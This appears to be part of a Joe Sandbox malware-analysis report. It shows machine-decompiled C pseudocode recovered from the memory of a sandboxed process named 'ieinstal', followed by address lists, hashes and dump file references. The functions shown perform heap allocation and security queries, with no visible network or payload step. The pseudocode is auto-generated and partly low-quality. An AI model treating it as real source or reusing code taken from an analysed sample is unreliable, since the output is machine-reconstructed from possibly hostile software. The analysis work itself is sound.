									_t162 =  *(_t240 + 8);
									__eflags = _t226 - _t162;
									if(_t226 >= _t162) {
										break;
									}
									_t230 =  *0x1f0b5d78; // 0x0
									_t216 = E1EFD5D90( *((intOrPtr*)(_t245 - 0x54)) + 1,  *((intOrPtr*)(_t245 - 0x48)), _t230 + 0xc0000,  *(_t245 - 0x70) +  *((intOrPtr*)(_t245 - 0x54)) + 1);
									 *(_t245 - 0x78) = _t216;
									__eflags = _t216;
									if(_t216 == 0) {
										L52:
										_t195 = 0xc0000017;
										L19:
										 *(_t245 - 0x44) = _t195;
										L20:
										_t208 =  *(_t245 - 0x40);
										__eflags = _t208;
										if(_t208 == 0) {
											L26:
											__eflags = _t195;
											if(_t195 < 0) {
												E1EFB7CF1( *((intOrPtr*)(_t245 - 0x68)), _t245 - 0x6c);
												__eflags =  *((char*)(_t245 - 0x39));
												if( *((char*)(_t245 - 0x39)) != 0) {
													 *0x1f0b5c90 =  *0x1f0b5c90 - 8;
												}
											} else {
												_t168 =  *(_t245 - 0x64);
												__eflags = _t168;
												if(_t168 != 0) {
													 *0x1f0b5c80 =  *0x1f0b5c80 - _t168;
												}
											}
											__eflags = _t195;
											if(_t195 >= 0) {
												 *((short*)( *((intOrPtr*)(_t245 - 0x68)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t228 = _t208 * 0xc;
										__eflags = _t228;
										_t196 =  *((intOrPtr*)(_t245 - 0x48));
										do {
											 *(_t245 - 0x40) = _t208 - 1;
											_t228 = _t228 - 0xc;
											 *(_t245 - 0x4c) = _t228;
											__eflags =  *(_t240 + _t228 + 0x10) & 0x00000002;
											if(( *(_t240 + _t228 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t240 + _t228 + 0x10) & 0x00000001;
												if(( *(_t240 + _t228 + 0x10) & 0x00000001) == 0) {
													 *(_t245 - 0x64) =  *(_t245 - 0x64) + 1;
													_t212 =  *(_t228 +  *(_t245 - 0x60) + 0x14);
													__eflags =  *((char*)(_t245 - 0x39));
													if( *((char*)(_t245 - 0x39)) == 0) {
														_t170 = _t212;
													} else {
														 *(_t245 - 0x50) =  *(_t212 +  *(_t245 - 0x58) * 4);
														E1EFD3BC0(_t196, 0, _t212 - 8);
														_t170 =  *(_t245 - 0x50);
													}
													L36:
													E1EFD3BC0(_t196, 0,  *((intOrPtr*)(_t170 - 4)));
													L37:
													_t208 =  *(_t245 - 0x40);
													_t228 =  *(_t245 - 0x4c);
													goto L24;
												}
												 *0x1f0b5c84 =  *0x1f0b5c84 + 1;
												goto L24;
											}
											_t170 =  *(_t228 +  *(_t245 - 0x60) + 0x14);
											__eflags = _t170;
											if(_t170 != 0) {
												__eflags =  *((char*)(_t245 - 0x39));
												if( *((char*)(_t245 - 0x39)) != 0) {
													E1EFFB6C9(_t170,  *((intOrPtr*)(_t240 + _t228 + 0x18)));
													goto L37;
												}
												goto L36;
											}
											L24:
											__eflags = _t208;
										} while (_t208 != 0);
										_t195 =  *(_t245 - 0x44);
										goto L26;
									}
									_t234 =  *(_t245 - 0x70) + 0x00000001 + _t216 &  !( *(_t245 - 0x70));
									 *(_t245 - 0x7c) = _t234;
									 *(_t234 - 4) = _t216;
									 *((intOrPtr*)(_t245 - 4)) = 0;
									E1F0088C0(_t234,  *((intOrPtr*)( *((intOrPtr*)(_t245 - 0x74)) + 8)),  *((intOrPtr*)(_t245 - 0x54)));
									_t247 = _t247 + 0xc;
									 *((intOrPtr*)(_t245 - 4)) = 0xfffffffe;
									_t217 =  *((intOrPtr*)(_t245 - 0x48));
									__eflags = _t195;
									if(_t195 < 0) {
										E1EFD3BC0(_t217, 0,  *(_t245 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t245 - 0x39));
									if( *((char*)(_t245 - 0x39)) != 0) {
										_t235 = E1EFF174A( *(_t245 - 0x4c));
										 *(_t245 - 0x50) = _t235;
										__eflags = _t235;
										if(_t235 == 0) {
											E1EFD3BC0( *((intOrPtr*)(_t245 - 0x48)), 0,  *(_t245 - 0x78));
											goto L52;
										}
										 *(_t235 +  *(_t245 - 0x58) * 4) =  *(_t245 - 0x7c);
										L17:
										_t236 =  *(_t245 - 0x40);
										_t220 = _t236 * 0xc;
										 *(_t220 +  *(_t245 - 0x60) + 0x14) =  *(_t245 - 0x50);
										 *((intOrPtr*)(_t220 + _t240 + 0x10)) = 0;
										_t226 = _t236 + 1;
										 *(_t245 - 0x40) = _t226;
										 *(_t245 - 0x50) = _t226;
										_t195 =  *(_t245 - 0x44);
										continue;
									}
									 *(_t245 - 0x50) =  *(_t245 - 0x7c);
									goto L17;
								}
								 *_t240 = 0;
								_t164 = 0x10 + _t162 * 0xc;
								__eflags = _t164;
								_push(_t164);
								_push(_t240);
								_push(0x23);
								_push(0xffffffff);
								_t195 = E1F002B70();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t240 = _t245 - 0x38;
						 *(_t245 - 0x5c) = _t240;
						goto L8;
					}
					goto L4;
				}
			}

0x1efe0d01
0x1efe0d03
0x1efe0d08
0x1efe0d0d
0x1efe0d17
0x1efe0d3c
0x1efe0d3c
0x00000000
0x1efe0d19
0x1efe0d31
0x1efe0d33
0x1efe0d33
0x1efe0d3a
0x1efe0d54
0x1efe0d57
0x1efe0d5a
0x1efe0d5d
0x1efe0d62
0x1efe0d6a
0x1efe0d6f
0x1efe0d74
0x1efe0d77
0x1efe0f6f
0x1efe0f74
0x1efe0f77
0x1efe0f7c
0x1efe0f7f
0x1efe0f81
0x1f02a05f
0x1f02a064
0x1f02a069
0x1efe0d3e
0x1efe0d41
0x1efe0d4d
0x1efe0d4d
0x1efe0f89
0x1efe0f8c
0x1efe0f8d
0x1efe0f90
0x1efe0f95
0x1efe0f98
0x1efe0f9a
0x00000000
0x00000000
0x1efe0fa0
0x1efe0fb4
0x1efe0fb6
0x1efe0fb9
0x1efe0fbb
0x1f02a052
0x1f02a057
0x1efe0fc1
0x1efe0fc1
0x1efe0fc1
0x1efe0fc4
0x1efe0fc6
0x1efe0d83
0x1efe0d83
0x1efe0d86
0x1efe0d8b
0x1efe0d91
0x1efe0d95
0x1efe0d99
0x1efe0da5
0x1efe0da7
0x1efe0daa
0x1efe0dac
0x1efe0ef6
0x1efe0efb
0x1efe0f03
0x1efe0f05
0x1efe0fd3
0x1efe0fd7
0x1efe0f0b
0x1efe0f0b
0x1efe0f0b
0x1efe0f0e
0x1efe0f12
0x1f02a141
0x1f02a141
0x1efe0f18
0x1efe0f1a
0x00000000
0x1efe0f20
0x1f02a14b
0x00000000
0x1f02a14b
0x1efe0f1a
0x1efe0db2
0x1efe0db8
0x1efe0dbb
0x1efe0dbf
0x1efe0fe1
0x1efe0feb
0x1efe0fee
0x1efe0ff3
0x1efe0dc5
0x1efe0dc5
0x1efe0dcb
0x1efe0dcb
0x1efe0dd9
0x1efe0ddc
0x1efe0dde
0x1efe0de1
0x1efe0de4
0x1efe0de4
0x1efe0de7
0x1efe0de9
0x00000000
0x00000000
0x1efe0def
0x1efe0e0e
0x1efe0e10
0x1efe0e13
0x1efe0e15
0x1f02a07d
0x1f02a07d
0x1efe0e9c
0x1efe0e9c
0x1efe0e9f
0x1efe0e9f
0x1efe0ea2
0x1efe0ea4
0x1efe0ed3
0x1efe0ed3
0x1efe0ed5
0x1f02a121
0x1f02a126
0x1f02a12a
0x1f02a130
0x1f02a130
0x1efe0edb
0x1efe0edb
0x1efe0ede
0x1efe0ee0
0x1f02a110
0x1f02a110
0x1efe0ee0
0x1efe0ee6
0x1efe0ee8
0x1efe0ef2
0x1efe0ef2
0x00000000
0x1efe0ee8
0x1efe0ea6
0x1efe0ea6
0x1efe0ea9
0x1efe0eac
0x1efe0ead
0x1efe0eb0
0x1efe0eb3
0x1efe0eb6
0x1efe0ebb
0x1f02a0cb
0x1f02a0d0
0x1f02a0dd
0x1f02a0e3
0x1f02a0e7
0x1f02a0eb
0x1f02a109
0x1f02a0ed
0x1f02a0f3
0x1f02a0fc
0x1f02a101
0x1f02a101
0x1efe0f2b
0x1efe0f30
0x1efe0f35
0x1efe0f35
0x1efe0f38
0x00000000
0x1efe0f38
0x1f02a0d2
0x00000000
0x1f02a0d2
0x1efe0ec4
0x1efe0ec8
0x1efe0eca
0x1efe0f25
0x1efe0f29
0x1efe0f66
0x00000000
0x1efe0f66
0x00000000
0x1efe0f29
0x1efe0ecc
0x1efe0ecc
0x1efe0ecc
0x1efe0ed0
0x00000000
0x1efe0ed0
0x1efe0e25
0x1efe0e27
0x1efe0e2a
0x1efe0e2d
0x1efe0e3a
0x1efe0e3f
0x1efe0e42
0x1efe0e49
0x1efe0e4c
0x1efe0e4e
0x1f02a0c1
0x00000000
0x1f02a0c1
0x1efe0e54
0x1efe0e58
0x1efe0f45
0x1efe0f47
0x1efe0f4a
0x1efe0f4c
0x1f02a078
0x00000000
0x1f02a078
0x1efe0f58
0x1efe0e64
0x1efe0e64
0x1efe0e67
0x1efe0e70
0x1efe0e74
0x1efe0e78
0x1efe0e79
0x1efe0e7c
0x1efe0e7f
0x00000000
0x1efe0e7f
0x1efe0e61
0x00000000
0x1efe0e61
0x1efe0e87
0x1efe0e8c
0x1efe0e8c
0x1efe0e8f
0x1efe0e90
0x1efe0e91
0x1efe0e93
0x1efe0e9a
0x00000000
0x1efe0fcc
0x00000000
0x1efe0fcc
0x1efe0fc6
0x1efe0d7d
0x1efe0d80
0x00000000
0x1efe0d80
0x00000000
0x1efe0d3a

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55d40c8bc82568305d545e90952362a088c499ee71d8a4700f252abb8bca7156
Instruction ID: d7827cbdd58e1b99b57e56eaf67ac0b7d4a6d6e9600e4d26b0d1c7bfe1238624
Opcode Fuzzy Hash: 55d40c8bc82568305d545e90952362a088c499ee71d8a4700f252abb8bca7156
Instruction Fuzzy Hash: DCC1AF75E00349DFDB14CFA5C8A4A9EBBF6FF88314F11422AE805AB645DB71B841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1EFE8FFB Relevance: .3, Instructions: 287
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E1EFE8FFB(void* __ecx, char __edx, signed int* _a4, signed int* _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int* _a24, signed int* _a28) {
				char _v5;
				char _v6;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				void* _t74;
				intOrPtr _t91;
				signed int _t93;
				void* _t94;
				intOrPtr _t97;
				signed int _t99;
				intOrPtr _t102;
				intOrPtr _t104;
				intOrPtr _t106;
				signed int _t108;
				intOrPtr _t113;
				signed int _t115;
				intOrPtr _t120;
				signed int _t122;
				void* _t125;
				signed int* _t126;
				char _t131;
				char _t133;
				char _t138;
				intOrPtr _t149;
				intOrPtr* _t152;
				void* _t153;

				_v6 = __edx;
				_t125 = __ecx;
				_v12 = 0;
				 *_a16 = 0;
				_v5 = 0;
				 *_a8 = 0;
				 *_a28 = 0;
				_t152 = _a4;
				 *_a12 = 0;
				 *_a20 = 0;
				 *_t152 = 0;
				_t149 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t131 = 0x48;
				if(__ecx == 0) {
					L11:
					_t153 = E1EFE9194(_t125, _a24);
					if(_t153 < 0) {
						L15:
						_t126 = _a28;
						L25:
						_t68 = _a4;
						if( *_a4 != 0) {
							E1EFD3BC0(_t149, 0,  *_t68);
							 *_a4 =  *_a4 & 0x00000000;
						}
						_t69 = _a20;
						if( *_a20 != 0) {
							E1EFD3BC0(_t149, 0,  *_t69);
							 *_a20 =  *_a20 & 0x00000000;
						}
						_t70 = _a8;
						if( *_a8 != 0) {
							E1EFD3BC0(_t149, 0,  *_t70);
							 *_a8 =  *_a8 & 0x00000000;
						}
						_t71 = _a12;
						if( *_a12 != 0) {
							E1EFD3BC0(_t149, 0,  *_t71);
							 *_a12 =  *_a12 & 0x00000000;
						}
						_t72 = _a24;
						if( *_a24 != 0) {
							E1EFD3BC0(_t149, 0,  *_t72);
							 *_a24 =  *_a24 & 0x00000000;
						}
						_t73 = _a16;
						if( *_a16 != 0) {
							E1EFD3BC0(_t149, 0,  *_t73);
							 *_a16 =  *_a16 & 0x00000000;
						}
						if( *_t126 != 0) {
							E1EFD3BC0(_t149, 0,  *_t126);
							 *_t126 =  *_t126 & 0x00000000;
						}
						if(_v5 == 1) {
							_push(_v12);
							E1F002A80();
						}
						_t74 = _t153;
						L14:
						return _t74;
					}
					if(_v6 != 0) {
						_push( &_v12);
						_push(8);
						_push(0xffffffff);
						_t153 = E1F003C30();
						if(_t153 >= 0) {
							_t91 =  *0x1f0b5d78; // 0x0
							_t133 = 0x48;
							_v5 = 1;
							_v36 = _t133;
							_t93 = E1EFD5D90(_t133, _t149, _t91 + 0x140000, _t133);
							 *_a16 = _t93;
							if(_t93 == 0) {
								L16:
								_t153 = 0xc0000017;
								goto L15;
							}
							_push( &_v36);
							_push(_v36);
							_push(_t93);
							_push(4);
							_push(_v12);
							_t94 = E1F002BC0();
							_t126 = _a28;
							_t153 = _t94;
							if(_t153 < 0) {
								goto L25;
							}
							_push( &_v24);
							_push(0);
							_push( *_t126);
							_push(5);
							_push(_v12);
							_t153 = E1F002BC0();
							if(_t153 != 0xc0000023) {
								goto L25;
							}
							_t97 =  *0x1f0b5d78; // 0x0
							_t99 = E1EFD5D90( &_v36, _t149, _t97 + 0x140000, _v24);
							 *_t126 = _t99;
							if(_t99 == 0) {
								goto L25;
							}
							_push( &_v24);
							_push(_v24);
							_push(_t99);
							_push(5);
							_push(_v12);
							_t153 = E1F002BC0();
							if(_t153 < 0) {
								goto L25;
							}
							_push(_v12);
							E1F002A80();
							goto L13;
						}
						_v5 = 0;
						goto L15;
					}
					L13:
					_t74 = 0;
					goto L14;
				}
				_t102 =  *0x1f0b5d78; // 0x0
				_v28 = _t131;
				_t104 = E1EFD5D90(_t131, _t149, _t102 + 0x140000, _t131);
				 *_t152 = _t104;
				if(_t104 == 0) {
					goto L16;
				}
				_push( &_v28);
				_push(_v28);
				_push(_t104);
				_push(4);
				_push(_t125);
				_t153 = E1F002BC0();
				if(_t153 < 0) {
					goto L15;
				}
				_t106 =  *0x1f0b5d78; // 0x0
				_t138 = 0x4c;
				_v32 = _t138;
				_t108 = E1EFD5D90(_t138, _t149, _t106 + 0x140000, _t138);
				 *_a20 = _t108;
				if(_t108 == 0) {
					goto L16;
				}
				_push( &_v32);
				_push(_v32);
				_push(_t108);
				_push(0x19);
				_push(_t125);
				_t153 = E1F002BC0();
				if(_t153 < 0) {
					goto L15;
				}
				_push( &_v16);
				_push(0);
				_push( *_a8);
				_push(5);
				_push(_t125);
				_t153 = E1F002BC0();
				if(_t153 != 0xc0000023) {
					goto L15;
				}
				_t113 =  *0x1f0b5d78; // 0x0
				_t115 = E1EFD5D90( &_v32, _t149, _t113 + 0x140000, _v16);
				 *_a8 = _t115;
				if(_t115 == 0) {
					goto L16;
				}
				_push( &_v16);
				_push(_v16);
				_push(_t115);
				_push(5);
				_push(_t125);
				_t153 = E1F002BC0();
				if(_t153 < 0) {
					goto L15;
				}
				_push( &_v20);
				_push(0);
				_push( *_a12);
				_push(6);
				_push(_t125);
				_t153 = E1F002BC0();
				if(_t153 != 0xc0000023) {
					goto L15;
				}
				_t120 =  *0x1f0b5d78; // 0x0
				_t122 = E1EFD5D90( &_v16, _t149, _t120 + 0x140000, _v20);
				 *_a12 = _t122;
				if(_t122 == 0) {
					goto L16;
				}
				_push( &_v20);
				_push(_v20);
				_push(_t122);
				_push(6);
				_push(_t125);
				_t153 = E1F002BC0();
				if(_t153 < 0) {
					goto L15;
				}
				goto L11;
			}

0x1efe9006
0x1efe900c
0x1efe900e
0x1efe9014
0x1efe9019
0x1efe901c
0x1efe9021
0x1efe9027
0x1efe902a
0x1efe902c
0x1efe9034
0x1efe9039
0x1efe903c
0x1efe903f
0x1efe9169
0x1efe9173
0x1efe9177
0x1efe918c
0x1efe918c
0x1f02d491
0x1f02d491
0x1f02d497
0x1f02d49e
0x1f02d4a6
0x1f02d4a6
0x1f02d4a9
0x1f02d4af
0x1f02d4b6
0x1f02d4be
0x1f02d4be
0x1f02d4c1
0x1f02d4c7
0x1f02d4ce
0x1f02d4d6
0x1f02d4d6
0x1f02d4d9
0x1f02d4df
0x1f02d4e6
0x1f02d4ee
0x1f02d4ee
0x1f02d4f1
0x1f02d4f7
0x1f02d4fe
0x1f02d506
0x1f02d506
0x1f02d509
0x1f02d50f
0x1f02d516
0x1f02d51e
0x1f02d51e
0x1f02d524
0x1f02d52b
0x1f02d530
0x1f02d530
0x1f02d537
0x1f02d539
0x1f02d53c
0x1f02d53c
0x1f02d541
0x1efe9185
0x1efe9189
0x1efe9189
0x1efe917d
0x1f02d3dd
0x1f02d3de
0x1f02d3e0
0x1f02d3e7
0x1f02d3eb
0x1f02d3f6
0x1f02d3fd
0x1f02d404
0x1f02d40a
0x1f02d40d
0x1f02d415
0x1f02d419
0x1f02d3d0
0x1f02d3d0
0x00000000
0x1f02d3d0
0x1f02d41e
0x1f02d41f
0x1f02d422
0x1f02d423
0x1f02d425
0x1f02d428
0x1f02d42d
0x1f02d430
0x1f02d434
0x00000000
0x00000000
0x1f02d439
0x1f02d43a
0x1f02d43c
0x1f02d43e
0x1f02d440
0x1f02d448
0x1f02d450
0x00000000
0x00000000
0x1f02d452
0x1f02d461
0x1f02d466
0x1f02d46a
0x00000000
0x00000000
0x1f02d46f
0x1f02d470
0x1f02d473
0x1f02d474
0x1f02d476
0x1f02d47e
0x1f02d482
0x00000000
0x00000000
0x1f02d484
0x1f02d487
0x00000000
0x1f02d487
0x1f02d3ed
0x00000000
0x1f02d3ed
0x1efe9183
0x1efe9183
0x00000000
0x1efe9183
0x1efe9045
0x1efe9050
0x1efe9055
0x1efe905a
0x1efe905e
0x00000000
0x00000000
0x1efe9067
0x1efe9068
0x1efe906b
0x1efe906c
0x1efe906e
0x1efe9074
0x1efe9078
0x00000000
0x00000000
0x1efe907e
0x1efe9085
0x1efe908c
0x1efe9091
0x1efe9099
0x1efe909d
0x00000000
0x00000000
0x1efe90a6
0x1efe90a7
0x1efe90aa
0x1efe90ab
0x1efe90ad
0x1efe90b3
0x1efe90b7
0x00000000
0x00000000
0x1efe90c0
0x1efe90c4
0x1efe90c6
0x1efe90c8
0x1efe90ca
0x1efe90d0
0x1efe90d8
0x00000000
0x00000000
0x1efe90de
0x1efe90ed
0x1efe90f5
0x1efe90f9
0x00000000
0x00000000
0x1efe9102
0x1efe9103
0x1efe9106
0x1efe9107
0x1efe9109
0x1efe910f
0x1efe9113
0x00000000
0x00000000
0x1efe9118
0x1efe911c
0x1efe911e
0x1efe9120
0x1efe9122
0x1efe9128
0x1efe9130
0x00000000
0x00000000
0x1efe9132
0x1efe9141
0x1efe9149
0x1efe914d
0x00000000
0x00000000
0x1efe9156
0x1efe9157
0x1efe915a
0x1efe915b
0x1efe915d
0x1efe9163
0x1efe9167
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 18bf63cae3c2e7054e865a6c4f8b4516c4b7e917eafc9aebe46e54cb039846e5
Instruction ID: 0801187c6bdd54a738584e73d6b9fbe2a81d54ac533392a2614b05ab3d15a5e1
Opcode Fuzzy Hash: 18bf63cae3c2e7054e865a6c4f8b4516c4b7e917eafc9aebe46e54cb039846e5
Instruction Fuzzy Hash: 2DA14875901215AFEB22DF64CCA5FAE7BB9EF49710F050594F900AB290D7B9AC10DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 1F045D60 Relevance: .3, Instructions: 264
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1F045D60(signed char* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _t85;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				intOrPtr _t106;
				signed int _t109;
				signed int _t113;
				signed int _t115;
				void* _t126;
				void* _t127;
				signed int _t131;
				intOrPtr _t132;
				intOrPtr _t134;
				void* _t135;
				void* _t138;
				signed int _t141;
				void* _t143;
				signed int _t145;
				signed int _t146;
				signed int _t153;
				void* _t154;
				signed int _t155;
				signed int _t156;
				intOrPtr _t157;
				signed int _t160;
				intOrPtr _t164;
				signed char* _t165;
				signed int _t167;

				_v24 = 0;
				_t163 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t138 = 8;
				_t156 = _t138;
				_v32 = 0;
				_v16 = _t156;
				_v20 = 0;
				_v12 = 0;
				_v8 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_v28 = 0;
				if(_a8 <= 0) {
					L13:
					_t143 = 0x14;
					if(_t138 == 8) {
						L16:
						if(_t156 == 8) {
							L19:
							_t85 =  *0x1f0b5d78; // 0x0
							_t164 = E1EFD5D90(_t143, _t163, _t85 + 0x140000, _t143);
							if(_t164 == 0) {
								L27:
								_t167 = 0xc0000017;
								L52:
								return _t167;
							}
							_t28 = _t164 + 0x14; // 0x14
							_t89 = _t28;
							if(_t138 == 8) {
								L23:
								_t144 = _v16;
								if(_v16 == 8) {
									L25:
									_t90 =  *0x1f0b5d78; // 0x0
									_t139 = _v8;
									_t92 = E1EFD5D90(_t144, _v8, _t90 + 0x140000, _v20);
									_v12 = _t92;
									if(_t92 != 0) {
										_v36 = _v36 & 0x00000000;
										__eflags = _a8;
										if(_a8 <= 0) {
											L42:
											_t167 = E1EFE8770(_t164, 1);
											__eflags = _t167;
											if(_t167 < 0) {
												L49:
												E1EFD3BC0(_t139, 0, _t164);
												L50:
												_t95 = _v12;
												if(_v12 != 0) {
													E1EFD3BC0(_t139, 0, _t95);
												}
												goto L52;
											}
											_t167 = E1EFE8710(_t164, _a12, 0);
											__eflags = _t167;
											if(_t167 < 0) {
												goto L49;
											}
											_t167 = E1EFE86B0(_t164, _a16, 0);
											__eflags = _t167;
											if(_t167 < 0) {
												goto L49;
											}
											_t167 = E1EFE8640(_t164, 1, _v24, 0);
											__eflags = _t167;
											if(_t167 < 0) {
												goto L49;
											}
											__eflags = _v32;
											_t167 = E1EFF7F70(_t164, (_v32 & 0xffffff00 | _v32 != 0x00000000) & 0x000000ff, _v32, 0);
											__eflags = _t167;
											if(_t167 < 0) {
												goto L49;
											}
											_t167 = 0;
											 *_a20 = _t164;
											goto L50;
										}
										_t141 =  &(_a4[4]);
										__eflags = _t141;
										do {
											_t157 = 0;
											_t106 =  *((intOrPtr*)( *((intOrPtr*)(_t141 + 4))));
											_v28 = _t106;
											_t145 = 8 + ( *(_t106 + 1) & 0x000000ff) * 4;
											_t109 =  *(_t141 - 4) & 0x000000ff;
											__eflags = _t109;
											if(_t109 == 0) {
												_t146 = _t145 + 0xc;
												__eflags = _t146;
												_v20 = _v24;
												_v16 = _t146;
												_t113 = E1F046844(_v12, _t146,  *(_t141 - 3) & 0x000000ff,  *(_t141 - 2) & 0x000000ff,  *_t141, _v28);
												L37:
												_t145 = _v16;
												_t167 = _t113;
												_t157 = _v20;
												L38:
												__eflags = _t167;
												if(__eflags < 0) {
													L48:
													_t139 = _v8;
													goto L49;
												}
												_t167 = E1EFBAFD0(_t145, __eflags, _t157, 2, 0xffffffff, _v12, _t145);
												__eflags = _t167;
												if(_t167 < 0) {
													goto L48;
												}
												goto L40;
											}
											_t115 = _t109 - 1;
											__eflags = _t115;
											if(_t115 == 0) {
												_v20 = _v24;
												_v16 = _t145 + 0xc;
												_t113 = E1F0468BC(_v12, _t145 + 0xc,  *(_t141 - 3) & 0x000000ff,  *(_t141 - 2) & 0x000000ff,  *_t141, _v28);
												goto L37;
											}
											__eflags = _t115 != 1;
											if(_t115 != 1) {
												goto L38;
											}
											_v20 = _v32;
											_v16 = _t145 + 0xc;
											_t113 = E1F046880(_v12, _t145 + 0xc,  *(_t141 - 3) & 0x000000ff,  *(_t141 - 2) & 0x000000ff,  *_t141, _v28);
											goto L37;
											L40:
											_t141 = _t141 + 0xc;
											_t160 = _v36 + 1;
											_v36 = _t160;
											__eflags = _t160 - _a8;
										} while (_t160 < _a8);
										_t139 = _v8;
										goto L42;
									}
									_t167 = 0xc0000017;
									goto L49;
								}
								_v32 = _t89;
								_t167 = E1EFE7C20(_t89, _t144, 2);
								if(_t167 < 0) {
									goto L48;
								}
								goto L25;
							}
							_v24 = _t89;
							_v36 = _t89 + _t138;
							_t167 = E1EFE7C20(_t89, _t138, 2);
							if(_t167 < 0) {
								goto L48;
							}
							_t89 = _v36;
							goto L23;
						}
						_t126 = _t143 + _t156;
						if(_t126 < _t143) {
							goto L27;
						}
						_t143 = _t126;
						goto L19;
					}
					_t26 = _t138 + 0x14; // 0x1c
					_t127 = _t26;
					if(_t127 < _t143) {
						goto L27;
					}
					_t143 = _t127;
					goto L16;
				}
				_t165 = _a4;
				do {
					_t153 =  *( *(_t165[8]) + 1) & 0x000000ff;
					_t131 =  *_t165 & 0x000000ff;
					if(_t131 == 0) {
						L7:
						_t132 = 0x14 + _t153 * 4;
						_t154 = _t132 + _t138;
						__eflags = _t154 - _t138;
						if(_t154 < _t138) {
							goto L27;
						}
						_t138 = _t154;
						goto L9;
					}
					_t135 = _t131 - 1;
					if(_t135 == 0) {
						goto L7;
					}
					if(_t135 != 1) {
						return 0xc000000d;
					}
					_t132 = 0x14 + _t153 * 4;
					_t155 = _t132 + _t156;
					if(_t155 < _t156) {
						goto L27;
					}
					_t156 = _t155;
					_v16 = _t156;
					L9:
					if(_v20 <= _t132) {
						_v20 = _t132;
					}
					_t165 =  &(_t165[0xc]);
					_t134 = _v28 + 1;
					_v28 = _t134;
				} while (_t134 < _a8);
				_t163 = _v8;
				goto L13;
			}

0x1f045d74
0x1f045d78
0x1f045d7d
0x1f045d7f
0x1f045d80
0x1f045d83
0x1f045d86
0x1f045d89
0x1f045d8c
0x1f045d8f
0x1f045d95
0x1f045e00
0x1f045e02
0x1f045e06
0x1f045e15
0x1f045e18
0x1f045e27
0x1f045e27
0x1f045e39
0x1f045e3d
0x1f045ead
0x1f045ead
0x1f04602c
0x00000000
0x1f04602c
0x1f045e3f
0x1f045e3f
0x1f045e45
0x1f045e67
0x1f045e67
0x1f045e6d
0x1f045e85
0x1f045e85
0x1f045e8d
0x1f045e97
0x1f045e9c
0x1f045ea1
0x1f045ec1
0x1f045ec5
0x1f045ec9
0x1f045fa9
0x1f045fb1
0x1f045fb3
0x1f045fb5
0x1f046013
0x1f046017
0x1f04601c
0x1f04601c
0x1f046021
0x1f046027
0x1f046027
0x00000000
0x1f046021
0x1f045fc2
0x1f045fc4
0x1f045fc6
0x00000000
0x00000000
0x1f045fd3
0x1f045fd5
0x1f045fd7
0x00000000
0x00000000
0x1f045fe6
0x1f045fe8
0x1f045fea
0x00000000
0x00000000
0x1f045fef
0x1f046001
0x1f046003
0x1f046005
0x00000000
0x00000000
0x1f046007
0x1f04600c
0x00000000
0x1f04600c
0x1f045ed2
0x1f045ed2
0x1f045ed5
0x1f045ed8
0x1f045eda
0x1f045edc
0x1f045ee3
0x1f045eee
0x1f045eee
0x1f045ef0
0x1f045f50
0x1f045f50
0x1f045f55
0x1f045f63
0x1f045f6a
0x1f045f6f
0x1f045f6f
0x1f045f72
0x1f045f74
0x1f045f77
0x1f045f77
0x1f045f79
0x1f046010
0x1f046010
0x00000000
0x1f046010
0x1f045f8d
0x1f045f8f
0x1f045f91
0x00000000
0x00000000
0x00000000
0x1f045f91
0x1f045ef2
0x1f045ef2
0x1f045ef5
0x1f045f2e
0x1f045f3c
0x1f045f43
0x00000000
0x1f045f43
0x1f045ef7
0x1f045efa
0x00000000
0x00000000
0x1f045f07
0x1f045f15
0x1f045f1c
0x00000000
0x1f045f93
0x1f045f96
0x1f045f99
0x1f045f9a
0x1f045f9d
0x1f045f9d
0x1f045fa6
0x00000000
0x1f045fa6
0x1f045ea3
0x00000000
0x1f045ea3
0x1f045e73
0x1f045e7b
0x1f045e7f
0x00000000
0x00000000
0x00000000
0x1f045e7f
0x1f045e4f
0x1f045e52
0x1f045e5a
0x1f045e5e
0x00000000
0x00000000
0x1f045e64
0x00000000
0x1f045e64
0x1f045e1a
0x1f045e1f
0x00000000
0x00000000
0x1f045e25
0x00000000
0x1f045e25
0x1f045e08
0x1f045e08
0x1f045e0d
0x00000000
0x00000000
0x1f045e13
0x00000000
0x1f045e13
0x1f045d97
0x1f045d9a
0x1f045d9f
0x1f045da6
0x1f045da9
0x1f045dd2
0x1f045dd2
0x1f045dd9
0x1f045ddc
0x1f045dde
0x00000000
0x00000000
0x1f045de4
0x00000000
0x1f045de4
0x1f045dab
0x1f045dae
0x00000000
0x00000000
0x1f045db3
0x00000000
0x1f045eb7
0x1f045db9
0x1f045dc0
